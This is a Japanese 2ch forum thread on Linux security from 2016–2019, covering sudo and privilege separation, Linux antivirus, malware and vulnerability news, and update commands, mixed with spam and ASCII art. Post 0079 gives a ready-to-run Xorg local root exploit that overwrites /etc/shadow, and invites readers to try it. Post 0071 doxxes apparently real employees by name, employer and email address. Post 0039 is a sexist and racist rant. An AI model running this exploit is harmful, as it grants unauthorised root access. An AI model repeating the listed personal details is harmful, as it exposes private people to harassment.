探検
Linuxセキュリティ総合スレ [無断転載禁止]©2ch.net
0021login:Penguin
2016/07/29(金) 12:00:07.41ID:r5rsVV/0侵入された時点でおしまいだろうに何言ってんだこいつって感じですかね。
0022login:Penguin
2016/07/29(金) 15:11:35.83ID:2cIkyZpH今の時代は「侵入された時点でおしまい」が許されないからこそブラウザとかはseccompやnamespaceを駆使して仮に脆弱性経由で何かコードが実行されても被害を最小限に食い止めるようにsandbox化に力を入れてたりするんだが
そもそもそれが許されるなら、一人で使うデスクトップ用途ではUbuntuみたいなわざわざ「普段非rootでログインして必要な時だけsu/sudoでrootになって実行する」
っていう行動にはセキュリティ的には何の意味もない、最初からrootでログインしてそのままエロサイト巡りしても何ら問題ないって事になるのは理解できるか?
もっとも昔はそれでも問題ないレベルだったのでWindowsではAdministratorでのログインがデフォになってたわけだが
そのあたりをきちんと理解しないで「Unix/LinuxはWindowsよりセキュアなんですーー」で思考停止してる馬鹿が大多数のせいで今の現状があるわけだ
その間にWindowsは、UACのように権限を得るためにはきちんとそれぞれへの入出力の機密性やコマンド自身の完全性をきちんと確保して「異アカウント間の分離」を破壊しないように考慮したり、
ILのように同アカウント内でもきちんとプロセス間を分離して保護(これは>>19の言うように強制アクセス制御で"一部"は解決できる)することでよりセキュアに進化した
一方残念ながら思考停止したUnix/Linuxは、権限を得るために「何の保護もない環境」から実行される「何の保護もされてないsu/sudoコマンド」に対して「何の保護もされてない状態でパスワードを入力する事」状態が放置され、
その一番基本的な「異アカウント間の分離」すら無意味になってる体たらく
結果的に「(sudoが使える非rootユーザーが)侵入された時点で(システム全体が)おしまい」になってるので、一周回ってお前の言ってることも正解なわけだがな
0023login:Penguin
2016/07/29(金) 15:40:50.53ID:2cIkyZpHきちんと設定されてなかったり(互換性のせいで出来ない)、ユーザーランドが糞の寄せ集めなせいで台無しだが
0024login:Penguin
2016/07/29(金) 16:57:07.30ID:AresjTJd卑近なって言ってもあなたの身近な人じゃなくてネットで皆の目に触れるようなブログやフォーラムでいいんだ。
xpが終わる時にデスクトップLinuxがって騒いでから、Linuxといえどのほほんとしてられないってのはみんな思ってることなんだ。
だから知りたいのは、いかに危険か、ではなく、危険なブツに出くわした時にどうすべきか、出くわした人はどう対処したか、なんだよ。
開発に携わった人のブログやコラム見つけて危険だ危険だって焚き付けるのなんて思考停止してもできることだろ?
LinuxユーザーがWindowsは危険だと騒ぐのが思考停止ならWindowsユーザーがLinuxは危険だと騒ぐのもまた思考停止じゃないの?対策を示すとか何かしない限り。
まるで、ゲームのバグを見つけたからプランナーや開発者より自分の方が優秀だって威張ってるデバッガーみたいだよ君は。
0025login:Penguin
2016/07/29(金) 17:23:02.18ID:2cIkyZpH俺みたいなゴミクズには解決する力も政治力もないから2chみたいな掃き溜めでグチってんのよ
Linux好きだから改善してほしいし、もし同じように問題だと感じる人が増えてくれれば改善される可能性も増すしね
そのために敢えて居丈高にLinuxに厳しくWindowsに甘く書いたんだ、ゴメン(´・ω・`)
0026login:Penguin
2016/07/29(金) 17:53:59.24ID:53ApPnD4あることするには続きは窓操作も必要だからじゃね?(あるいは暗号のようなパス書かないと辿れないとか)
そういう不便さを有難くセキュリティーが強いというのかどうか
0027login:Penguin
2016/07/29(金) 19:36:23.87ID:IWyIiLvv0028login:Penguin
2016/07/29(金) 21:02:48.88ID:2cIkyZpHKDEの開発の人とかちゃんといまのXやシェルとかの実行環境には問題があることを認めてどうしたら良いか考えてる人もいるんだよなー
でも自分の開発してるソフトウェアだけが対応してもshellとかの他のソフトウェアのせいでそれが無意味になっちゃったりで困ってる
0029login:Penguin
2016/07/30(土) 13:47:31.26ID:m4BHHueFそれと、強制アクセス制御のステータスってのは何らかのファイルにロギングされんの?
0030login:Penguin
2016/07/30(土) 13:54:08.97ID:m4BHHueFノーガードきめこんで運用してたら、そりゃあ狙われた時に簡単にクラッシュしますがな。
(肝心な釘打ち無しで構築してるもんだから)
Windowsの世界ではねセキュリティソフト入れて丸投げしてるわけ。
但し、ユーザーの中には変わり者がいて、ノーガードな奴もいる訳、
まあ、他人ごとでどうなろうが知ったことじゃないが…
0031login:Penguin
2016/08/13(土) 02:05:03.68ID:oD+tGgzqhttp://www.itmedia.co.jp/enterprise/articles/1608/12/news047.html
0032login:Penguin
2016/08/13(土) 04:51:41.40ID:aN9vHd6iすぐ更新されるから慌てなさんな
0033login:Penguin
2016/08/13(土) 08:48:05.17ID:TXBKXjH82012年からあった脆弱性がすぐに修正されるの?
0034login:Penguin
2016/08/13(土) 08:55:27.99ID:1K0xoI1z0035login:Penguin
2016/08/13(土) 11:19:12.09ID:UrcrvCqb修正が難しいわけじゃないのだろう。
0036login:Penguin
2016/08/14(日) 13:17:03.39ID:gduCaAAfだろ
0037login:Penguin
2016/08/14(日) 14:21:25.00ID:IM019vfG0038login:Penguin
2016/08/14(日) 18:52:10.23ID:fe3iWrgq自分で確認したら?ガバガバだから。ただし、法令違反で引っ張られないように工夫しろよ。
官公庁はWindows serverじゃないの?
0039login:Penguin
2016/09/03(土) 02:42:39.64ID:T3i7Gd65なんで飲み行かないの?
なんで女の子誘って飲みに行かないの?
声掛けないと飲みいけないのに。
話しないと恋は始まらないよ。
声掛けないとSEXもさせてくれないのに。
声掛けないから、
ヤンキーみたいなオジサンが誘いだして大きなこと言って、不倫してるよ。
女の子誘って飲みにきなよ。
女の子に声掛けないと、恋も出来ないよ。
SEXしたかったら、声掛けて飲みに行きなよ。
残業してる間に、持っていかれちゃってるよ。
後ろから見たら、がに股になってる女の子見たことない?
SEXしたかったら、なんでもいいから声掛けて飲みに行きなよ。
残業しても恋はできないよ。SEXできないよ。
恋をしなけりゃ、SEXはさせてもらえない。
恋をするには、話して気に入ってもらうしかない。
気に入ってもらうには、飲み行くのが近道だろ。
別に会議で、大きな事言ってもいいけど。
どうせSEX出来るまで何度も繰り返すんだろうから、
そのうち年配の方々にめんどくさがられて、遠くに飛ばされるよ。
そんなだったら、飲みに行くのが一番だろ。
別にがに股のさせこちゃんを探して、お願いしてみてもいいけど。
ばれたとき、周りの目が厳しいぞ。
お前が呼ばないから、ほらみろ可愛い子はみんなやられて。
残っているのはブスばかりになってるじゃないか。
ブスはキツイぞ。
誘えないなら、韓国人でも買えよ。みんなそうしてるぞ。
0040login:Penguin
2016/09/06(火) 16:46:15.64ID:vVf8gi4f0041login:Penguin
2016/09/06(火) 22:53:44.42ID:TopTMWtnなんでよ?シスコ様だぞ?
0042login:Penguin
2016/09/07(水) 07:09:59.88ID:O110MSh/0043login:Penguin
2016/09/13(火) 10:37:58.85ID:g0CBlyhH0044login:Penguin
2016/09/17(土) 18:12:13.92ID:9GLGaOH40045login:Penguin
2016/09/29(木) 12:32:01.60ID:ZwQJlT8x0046login:Penguin
2016/09/29(木) 12:44:59.58ID:5wiRFmuo0047login:Penguin
2016/09/29(木) 12:54:29.04ID:lvJNOdKb0048login:Penguin
2016/09/29(木) 20:57:19.24ID:SWTYFo2r0049login:Penguin
2016/10/04(火) 17:05:57.73ID:ZgAPWl/3乗り換えると最強になるの?
0050login:Penguin
2016/10/04(火) 21:10:03.74ID:MfnjwfuN0051login:Penguin
2016/10/23(日) 10:01:10.29ID:PWQ2IPcX出て行く通信のフィルタを書くためには
結局IPTABLES書かなきゃいけないのはなおった?
なおったなら乗り換える。
0052login:Penguin
2016/11/30(水) 12:37:43.41ID:SfHGIzEu(´・ω・) < おっかのうえひっなげしのはぁながぁぁ 〜
(U )
`u-u´
0053login:Penguin
2017/01/20(金) 17:47:06.69ID:OITYnSWZ(\ ∞ ノ
ヽ)_ノ 迫る〜パンチ〜〜♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0054login:Penguin
2017/02/01(水) 08:09:39.67ID:gwo76No6(´・ω・`) 迫る〜ハゲッ♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0055login:Penguin
2017/02/13(月) 20:59:43.28ID:aKHZLuDZ0056login:Penguin
2017/03/08(水) 21:47:52.30ID:TuQ4x/Y7.ミ,,・_・ミ 迫る〜ハゲッ♪
(=O┬O
◎-ヽJ┴◎ キキ〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
0057login:Penguin
2017/04/19(水) 13:43:38.91ID:kexeXY6M0058login:Penguin
2017/04/28(金) 16:59:33.55ID:ZiXyj8JT過去の話なんすね。それなのに未だにLinuxを
安全って紹介してる所ばかりなのは何でですかね
0059login:Penguin
2017/04/30(日) 00:21:15.39ID:zhwkJ+1uWindowsでは散々あるけど
0060login:Penguin
2017/04/30(日) 00:36:51.26ID:3yi8UZQK0061login:Penguin
2017/04/30(日) 14:38:15.54ID:6nvs6+SR0062login:Penguin
2017/04/30(日) 19:21:48.33ID:K1kIRV9aマシンの使用用途によりけりだとは思いますが、
僕の自宅鯖はfail2banだけです。
有用な物や便利な物があれば教えて欲しいです。
0063login:Penguin
2017/05/09(火) 10:29:04.72ID:6kIUOBHa今までosの脆弱性突かれてどうこうてのは
無いなあ
過去10年起きたのは、全てユーザーの問題
クソみたいなパスワード突破されたとか、
ゴミみたいなコードからのインジェクションとかのみ
0064login:Penguin
2017/06/16(金) 09:15:27.82ID:Cv6QgGNP0065login:Penguin
2017/06/16(金) 09:16:10.27ID:Cv6QgGNP0066login:Penguin
2017/07/03(月) 23:36:13.34ID:cDHqg+NIで暗号化してたファイルが、急に、
openssl enc -d 〜
で開けなくなりました。
ファイルが壊れたかとめちゃくちゃ焦ったけど、
タイムスタンプは去年のまま変化なし。
本家から、1.0.2lを落としてコンパイルした実行ファイルからだと
問題なく開けたからファイルの問題ではない模様。
1.1.0のバグですか?
#確か2ヶ月前ぐらいだとパッケージインストールされている
1.1.0系でも問題なかったはずですが。
linux-mint(ubuntu16.04)です。
0067login:Penguin
2017/07/04(火) 01:23:11.94ID:RdyHvcf/くだらねえ質問はここに書き込め!Part 228
http://hayabusa6.2ch.net/test/read.cgi/linux/1494314571/
で聞いたほうが良いと思う
006866
2017/07/05(水) 00:22:13.88ID:uEgHtGC3ありがとう。
次回からそうするわ。
ちなみに、今回のは下記参考に自己解決したっぽい。
-md md5付けたら、現行1.1.0でもファイル開けました。
https://github.com/fastlane/fastlane/issues/9542
https://unix.stackexchange.com/questions/344150/why-can-one-box-decrypt-a-file-with-openssl-but-another-one-cant
0069login:Penguin
2017/09/07(木) 19:37:24.22ID:NhVQ+S22全くセキュリティーパッチを充てていないrhel6.1で、poodle対策をしなきゃいけないんだが、
設定変更だけで対処する場合は、ssl.confのcipherのところに -sslv3入れるだけで良い?
0070login:Penguin
2017/10/16(月) 19:17:31.78ID:AvEU8VfP_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0071login:Penguin
2017/11/03(金) 21:09:20.77ID:UMEHXcXhセキュリティの基本は尖らないこと、目立たないこと。隠すこと。 バカ。
新名主 隆志 TIS shimmyozu.takashi@technopro.com
色田 眞吾 日立製作所 Shikita.Shingo@technopro.com
八木 一暢 TIS yagi.kazunobu@technopro.com
水野 潤 ハマゴムエイコム Mizuno.Jun@technopro.com
佐々木 優也 (首都圏第1支店案件) sasaki.yuya@technopro.com
佐々木 健太 日立製作所 sasaki.kenta@technopro.com
中野 洋行 NSSLCサービス Nakano.Hiroyuki@technopro.com
永井 真祐子 富士ソフト nagai.mayuko@technopro.com
品川区高輪3-25-33
都内のトイレに花子さんだ
日立の末端は、ただの派遣会社だからな。メーカーはどこも一緒か。。
0072login:Penguin
2017/12/29(金) 13:14:18.48ID:S/CsVkMC参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。
グーグル検索⇒『宮本のゴウリエセレレ』
HRT6GIPYTB
0073login:Penguin
2018/04/11(水) 07:03:34.17ID:9VtMkuZE_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0074login:Penguin
2018/05/22(火) 11:10:27.97ID:Czl6p0FW関心がある人だけ見てください。
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』
BTBIK
0075login:Penguin
2018/05/26(土) 09:20:44.99ID:c6Ml0Dodhttp://hayabusa9.2ch.net/test/read.cgi/news/1527149278/l50
0076login:Penguin
2018/05/26(土) 12:43:59.58ID:H0+abEbN0077login:Penguin
2018/05/27(日) 16:31:34.31ID:QzfBv+yQ0078login:Penguin
2018/07/08(日) 20:50:42.96ID:QTYf4jMn_,,..,,,,_
/ ,' 3/⌒ヽ-、_
/l. /____/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄
0079login:Penguin
2018/10/31(水) 11:46:41.86ID:XLo7vX23https://www.exploit-db.com/exploits/45697/
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
xorgはフォントパスのリストをそのままログに書き込むことを利用してる
(shadowが上書きされるので試すならshadowのバックアップを取ってからどうぞ)
0080login:Penguin
2019/03/10(日) 12:39:41.95ID:BHkfBLF0| 8 )
∧,,,∧∩-''"
_ ..(´・ω・`)彡 おぱんつ おぱんつ ! !
〃(\ ∞ ,⊂彡
`ヽ)_ノ| |
し⌒J
0081login:Penguin
2019/05/24(金) 01:31:09.68ID:WQ5DwMzT( ´ ・ω・) 呼んだ ?
0082login:Penguin
2019/05/31(金) 12:30:43.06ID:bdQbsGXYhttps://news.mynavi.jp/article/20190531-833791/
Intezerは5月19日(米国時間)、Linuxシステムを標的とした新しいマルウェア「HiddenWasp」を
発見したと「Intezer - HiddenWasp Malware Stings Targeted Linux Systems」で伝えた。
このマルウェアは現在も活動を継続しており、主要なアンチウィルスシステムで検出することが
できないと指摘されている。発見されたHiddenWaspの主な特徴は以下の通り。
・Linuxマルウェアの多くは仮想通貨マイニングやDDoS攻撃に焦点を当てているが、HiddenWasp
は異なっている。HiddenWaspはトロイの木馬として設計されており、標的のシステムを純粋に
リモートコントロールするために開発されている
・HiddenWaspに感染しているユーザーはすでに標的型攻撃のターゲットになっている可能性が
高い
・HiddenWaspはMiraiやAzazelルートキットといった入手可能なオープンソース・マルウェア
から大量のソースコードが流用されている
・HiddenWaspは中国のマルウェアファミリーに強い類似性があるものの、帰属に関しては可能
性が低いと見られる
Intezerは、Linuxを標的としたマルウェアは時間の経過とともにますます複雑になり続けている
と指摘。現在、一般的な脅威でも検出率があまり高くないが、より高度な脅威はさらに検出率が
低いという。今後、Linuxを標的としたマルウェアはさらに検出が難しくなるおそれがあり、
注意が必要。
0083login:Penguin
2019/06/01(土) 00:37:42.11ID:/N3jDoCjこれはひどい
俺が唯一Linuxに移行できない理由がアンチウイルスソフトだからな
Windowsのノートンみたいに完璧なのがあれば、ノートン一つで完全に防げるけど、
Linuxにはこれがないからな
SophosAntiVirusがあるが、なぜか定義ファイルの更新が20日異常ないぞ(気のせい?)
RKHunter、Tripwire、Lynis、Firewallとかだけとかありえんだろ?
0084login:Penguin
2019/06/01(土) 03:51:20.70ID:BeN0lDY70085login:Penguin
2019/06/01(土) 08:23:33.96ID:0WGBvA8Dノートンは3日後だったことがあった
0086login:Penguin
2019/06/01(土) 23:05:01.15ID:aQmSSgBv毎日更新してるんじゃないかな
ノートンやトレンドマイクロが対応してない最新のウィルスを先んじて検出したことがあったし、古い日付になってる定義ファイルはベースとなるやつの日付だと思ってる。
008783
2019/06/02(日) 01:29:08.34ID:Zexh2AIq次のバージョンをアップデート中です - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
Updating Sophos Anti-Virus....
Updating SAVScan on-demand scanner
Updating Virus Engine and Data
Updating Manifest
Update completed.
次のバージョンにアップデートしました - SAV: 9.15.1、エンジン: 3.74.2、データ: 5.63
sdds:SOPHOS からの Sophos Anti-Virus のアップデートに成功しました
$ sudo /opt/sophos-av/bin/savdstatus --version
Copyright 1989-2018 Sophos Limited. All rights reserved.
Sophos Anti-Virus = 9.15.1
ビルドのリビジョン = 2793374
脅威検出エンジン = 3.74.2
脅威データ = 5.63
検出脅威数 = 35620036
脅威データリリース日 = 2019年05月07日 00時00分00秒
前回アップデートを確認した日時 = 2019年06月02日 01時01分28秒
と脅威データリリース日がずっと5/7のままなんだよね
これでも最悪1日毎には更新してるのかね?
ノートンだと1時間に1回は更新してるっぽいけど
更新しててくれてると助かるのだが
008883
2019/06/02(日) 01:30:11.25ID:Zexh2AIq008983
2019/06/03(月) 00:52:09.01ID:LINEVdyyここ見たらやはり1日1回ぐらいは更新されてそう
実際俺のSophosは普通に6/2更新されてた
どうも"脅威データリリース日 = 2019年05月07日 00時00分00秒"と
ウイルス定義ファイル更新日は違うらしい
ウイルス定義ファイル更新日もちゃんと書けよ>Sophos
Sophos Anti-Virus: ウイルス定義ファイル (IDE ファイル) が最新の状態にアップデートされているかどうかを確認する方法
https://community.sophos.com/kb/ja-jp/121984
0090login:Penguin
2019/06/03(月) 02:02:29.21ID:jJq3PPoG0091login:Penguin
2019/06/03(月) 02:06:37.36ID:jJq3PPoG世に知れ渡っていないウイルスが仕込まれていた場合に
ウイルス検知ソフトがそれを正しく検出してくれることはまれ。
何ヶ月か何年かあとになって改めてチェックしてみると検出される場合がある。
でもダウンロードあと、そこまで待ってインストールする人はいない。
0092login:Penguin
2019/06/03(月) 08:05:48.00ID:eMJGOUo4これの元記事によるとvirustotalで引っかからない
https://www.intezer.com/wp-content/uploads/2019/05/pasted-image-0-1.png
つまりノートンだろうが何だろうが脅威としないで放置されるということ
感染経路はわからんが野良危険ということだろう
0093login:Penguin
2019/06/03(月) 22:51:46.35ID:sgwkICklこれは具体的にどう注意したらいいんだ?
009483
2019/06/03(月) 22:56:08.11ID:LINEVdyy↓となってるから(途中に更新あったかは知らんが多分ないだろ)
昨日
<published>2019-06-02T13:03:35</published>
今日
<published>2019-06-03T13:07:34</published>
0095login:Penguin
2019/06/04(火) 11:45:07.22ID:JnEdCGFR009683
2019/06/04(火) 23:57:45.16ID:8eAlB9kG全部、適当に入れればいいよ
メアドは@と.orgとか.comは入れないとだめだけど、これも適当で大丈夫
0097login:Penguin
2019/06/05(水) 09:35:56.10ID:2u//H+UO0098login:Penguin
2019/06/05(水) 21:45:09.38ID:1PL8mpQbあったとしても、100%適当で通るよ
役職・法人名も適当でおk
国、県、郵便番号は日本、東京、1000000でおk
ちなみにLinux版はこれね
https://secure2.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux/download.aspx
https://www.sophos.com/ja-jp/products/free-tools/sophos-antivirus-for-linux.aspx
ここからいって普通に全部適当に入力しおわったら、自動でダウンロード始まるよ
0099login:Penguin
2019/06/06(木) 13:34:15.13ID:Vt0/9sNy都道府県がなぜか受け付けてくれない
0100login:Penguin
2019/06/06(木) 20:22:08.58ID:yFuR+pcY先に国名で「日本」選んだら都道府県欄に▲▼が出て、普通にマウスクリックで「Tokyo」が選べるようになるでしょ
国名: 日本
都道府県:Tokyo
郵便番号:100-0000
で大丈夫だよ
0101login:Penguin
2019/06/07(金) 09:06:17.12ID:boyNvVP0▲▼が出てこない
0102login:Penguin
2019/06/07(金) 20:09:33.53ID:/Sk2vmHZオフになってるんじゃない?
0103login:Penguin
2019/06/07(金) 21:33:16.30ID:yVEJ6IS3これはちと使えないわ
0104login:Penguin
2019/06/07(金) 23:40:08.48ID:/Sk2vmHZ0105login:Penguin
2019/06/08(土) 02:35:25.81ID:/huWGbTD1年間9500円アップグレード4700円って高いな
ライセンスだけでメンテナンス不要版もあるの?
値段はここの43ページ
https://www.symantec.com/content/ja/jp/micro_partner/Sales_guide_SEPSPS_14_2013Feb.pdf
0106login:Penguin
2019/06/10(月) 15:44:13.86ID:9N/TTeW/ESETはWIn版にはあるみたいだけど、Linux版にはないみたいだし。
UEFIの脆弱性(Intel ME)を考えたらLinuxパソコンの最大の弱点はUEFIだと思うのですが。
オープンソースで誰か作ってくれないかな・・・
0107login:Penguin
2019/06/18(火) 02:35:54.34ID:AVJfVicPCatalin Cimpanu (ZDNet.com) 翻訳校正: 編集部 2019年06月17日 10時47分
https://japan.zdnet.com/article/35138550/
Microsoftは米国時間6月14日、「Exim」経由で拡散するLinuxのワームについて、一部の
Azureも影響を受けるとしてAzure顧客向けに警告を出した。
このワームは米ZDNetが6月13日に最初に報じ、その後詳細情報がレポートされたもので、
CVE-2019-10149の脆弱性を利用してEximメールサーバーに感染する。この脆弱性は、悪用
されると攻撃者が遠隔からコマンドを実行してパッチを当てていないシステムを乗っ取る
ことができるというものだ。
ワームはこの脆弱性を利用してサーバーを乗っ取り、他のサーバーをスキャンして感染を
広げようとする。そして乗っ取ったホストに暗号通貨マイニングを投下する。
Eximはメール転送エージェント(MTA)で、Linuxベースの電子メールサーバー上で動かし
送信者から受信者に電子メールのリレーを行う。このワームはEximが動くサーバーを狙う。
Microsoftが14日に出した警告によると、Azureインフラもこのワームの影響を受けると
いう。幸い、Azureインフラは「このワームの拡散を制限するのを助けるための制御」を
敷いているとMicrosoftは述べている。(後略)
0108login:Penguin
2019/06/18(火) 17:26:10.39ID:6P/bvjY8PANIC) (CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-5599)
2019年6月18日 05:11 Kazuki Omo
https://security.sios.com/vulnerability/misc-security-vulnerability-20190618.html
こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面 和毅です。
06/17/2019にNetflixからFreeBSDとLinux Kernelに対して、幾つかのTCPの脆弱性に関する
アドバイザリーが出されました(CVE-2019-11477, CVE-2019-11478, CVE-2019-11479,
CVE-2019-5599)。アドバイザリーは最小セグメントサイズ(MSS)とTCP SACKに関するものに
なります。最も深刻な「SACK Panic」と呼ばれるものは、最近のLinux Kernelにリモート
からKernel Panicを引き起こすことができます。Netflixの方でPatchも提供されています。
今後も情報が出てくると思われますので、こちらで取り上げます。
逐次情報は更新していく予定です。
0109login:Penguin
2019/06/22(土) 09:34:44.67ID:BWxAJ8Sjまた、
◆snapアプリのアップデートはaptコマンドでは不可能である。
初心者向けに、Ubuntuを例にセキュリティーアップデートの手順を示す。(Kubuntu、Xubuntu、LubuntuなどのUbuntuフレーバーたちも同じ)
(1)ターミナルを開き、下記のコマンドを打ち、最新情報を取得する。
$ sudo apt update
(2)最新の情報が取得され、システムは最新ですとの表示が出たら(4)に飛ぶ。もし、アップデートの必要のあるパッケージがあることが示されたら、次のコマンドを打ち、パッケージをダウンロードしてインストールする。
$ sudo apt -y upgrade
ちなみに「-y」オプションは付けても付けなくても良いが、付けなかった場合には、インストール直後に本当にインストールして良いを[Y/N]と表示して確認してくる。この場合はYesを意味するYを押すことでインストールが始まる。
「-y」オプションを付けるとこの手順が飛ばされてダウンロードが完了次第、すぐにインストールが開始される。
(3)次の2つのコマンドは、それぞれ上記のコマンド実行の結果として、不要となった古いパッケージ、不要となったキャッシュを削除する。掃除であるから実行はたまにで良いが、ストレージ容量が少ない環境の人は頻繁にやるべきだろう。
$ sudo apt autoremove
$ sudo apt autoclean
(4)次にsnapアプリの更新を行う。
$ sudo snap refresh
snapアプリをインストールした覚えが無くとも、システムがsnapを使っているため必ず実行すること。例えばGNOMEシェルはsnapであり、Ubuntu18.04.x LTSはすでに更新の必要が出ているので、未実行であれば直ぐに実行し最新版にしよう。
GUIからはすべてのアップデートや掃除はできない。取り分けsnapは(4)の手動アップデートでなければ更新できない。
出来るだけ毎日、しっかりアップデートを行い、セキュアなLinuxライフを送ろう。
0110login:Penguin
2019/07/03(水) 23:55:13.69ID:OptOlEBILinuxなんて使わない。
以上。
0111login:Penguin
2019/09/29(日) 21:20:57.29ID:Nip3Jzi1(,,・_・).。oO( 毛深くなりたい・・・ )
ヾ(,_uuノ
0112login:Penguin
2019/10/13(日) 01:09:29.50ID:ueikBXbuhttps://jp.techcrunch.com/2019/05/08/2019-05-07-android-developers-can-now-force-app-updates/
0113login:Penguin
2019/10/25(金) 00:20:33.72ID:j4GkuklAそれ違う
負けないためには、だね
コモドでいいよな?
0114login:Penguin
2019/12/12(木) 00:50:01.16ID:jaG34Ck9https://leia.5ch.net/test/read.cgi/poverty/1576065630/
供給電圧を変化させてプロセッサを攻撃する新ハッキング手法「プランダーボルト」が発見される | TechCrunch Japan
https://jp.techcrunch.com/2019/12/11/2019-12-10-plundervolt-attack-breaches-chip-security-with-a-shock-to-the-system/
Plundervolt
https://plundervolt.com/
17 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 2bc5-3D6L)[sage] 投稿日:2019/12/11(水) 21:19:15.97 ID:x8hKACYL0
電圧変えて何すんのよ
システムダウン?
19 名前:番組の途中ですがアフィサイトへの転載は禁止です (ブーイモ MM39-B8XO)[sage] 投稿日:2019/12/11(水) 21:24:40.54 ID:/b3E3oTYM
>>17
プロセッサ内で隠蔽されている暗号鍵を取得する。Blurayの暗号鍵もインテルの脆弱性で割れた
26 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa13-MFI9)[sage] 投稿日:2019/12/11(水) 22:31:10.46 ID:g2xDg2x0a
>>17
エラーが起きたと思って秘匿領域のデータをダンプするんだってさ
0115login:Penguin
2019/12/12(木) 02:35:29.36ID:QpDguOY00116login:Penguin
2019/12/12(木) 19:43:32.89ID:jaG34Ck944 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ 5720-kui+)[] 投稿日:2019/12/12(木) 00:45:08.31 ID:gd2ZuGmF0 [1/2]
>1>19>26
なにこれ?
PC起動してないとCPUコントロール出来ないよね?
もしかして、ハードディスク暗号化してるPCを起動して、
暗号化解除する前にこの脆弱性使うと暗号化解除出来ちゃうとか?
>プロセッサ内で隠蔽されている暗号鍵
>秘匿領域
ここに何が格納されてるのか分からん
スーパーハッカー解説お願いします。
54 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイ e228-kui+)[] 投稿日:2019/12/12(木) 03:25:28.44 ID:QS0Nrunu0
>>44
ハードディスク暗号化してるPCを起動して、暗号化解除して使用してる最中に、
この脆弱性を使うとCPUが隠してた暗号鍵を見ることができる
63 名前:番組の途中ですがアフィサイトへの転載は禁止です (アウアウエー Sa3a-0Ppm)[sage] 投稿日:2019/12/12(木) 05:18:32.13 ID:nA2cuX1+a
>>51
電圧いじれる(管理者)権限があってもSGXでやり取りされてる内容が見られないってのがウリの機能なので
UHD-BDの暗号化解除機構に使われてるんやで
55 名前:番組の途中ですがアフィサイトへの転載は禁止です (ワッチョイWW 5720-AQmm)[] 投稿日:2019/12/12(木) 03:55:03.70 ID:gd2ZuGmF0 [2/2]
>>54
それは結構やばいなあ
まあ、暗号化解除前では意味なさそうなのが救いだな
てか、cpuってハードディスクの暗号化解除後もcpu内に暗号を常時置いとくもんなの?
0117login:Penguin
2019/12/13(金) 19:09:08.80ID:ESmGY9a7コアダンプしそう
0118login:Penguin
2019/12/13(金) 19:14:21.26ID:ESmGY9a7流石にそこまで早くないか
0119login:Penguin
2019/12/16(月) 00:27:12.94ID:Oy6287lw0120login:Penguin
2019/12/16(月) 05:28:15.87ID:AxOoqKNy0121login:Penguin
2019/12/16(月) 06:38:47.87ID:AxOoqKNyWSLがどうでも良いわけじゃないだろうけど。
レスを投稿する
ニュース
- 【和歌山】悪質あおり運転映像、YouTuberが公開 和歌山県警の態度が一変、捜査開始へ テレビ報道の影響か★2 [PARADISE★]
- 「総理になってやりたい仕事がある」(ライドシェアや副業全面解禁) 茂木敏充氏、自民総裁選に意欲 [蚤の市★]
- 【長野】粗大ごみの中から現金9万円 警察に届け出ず処理施設の職員たちが飲食に使用 見つけた現金で菓子やジュース購入…習慣化 [ぐれ★]
- 【能登は見捨てられた…】能登半島地震から半年…復旧復興はなぜ進まないのか ★3 [ぐれ★]
- 【ドジャース】大谷翔平、26号ソロで1安打1打点 メジャー通算500打点にリーチ リーグ打撃3冠にも一歩前進 チームは延長11回の激戦制す [フォーエバー★]
- 【音楽】サザン「TSUNAMI」解禁へ高まる期待 東日本大震災で「封印」も渋谷の特別展示で… [少考さん★]
- 【悲報】ニコニコ動画、免許証で本人確認するとプレミア会員1年無料キンャペーンを行っていた事が判明wwwwwwwwwwwww [164492938]
- 【実況】博衣こよりのえちえちFF5🧪★3
- ∩∩
 ( 'ω' (・△・🌸)
 ( ⊂ )
と__))((__つ
- 【画像】実話BUNKAタブーの今月号の表紙がこれ。感想よろ [193890393]
- 【速報】都知事選、「ひまそらあかね」に期日前投票されまくるWWWWWWWWWWWWWWWWWWWWWWWWWWWWW [776920507]
- 俺(33歳上場企業財務部係長)←こいつが結婚できない理由wwwwww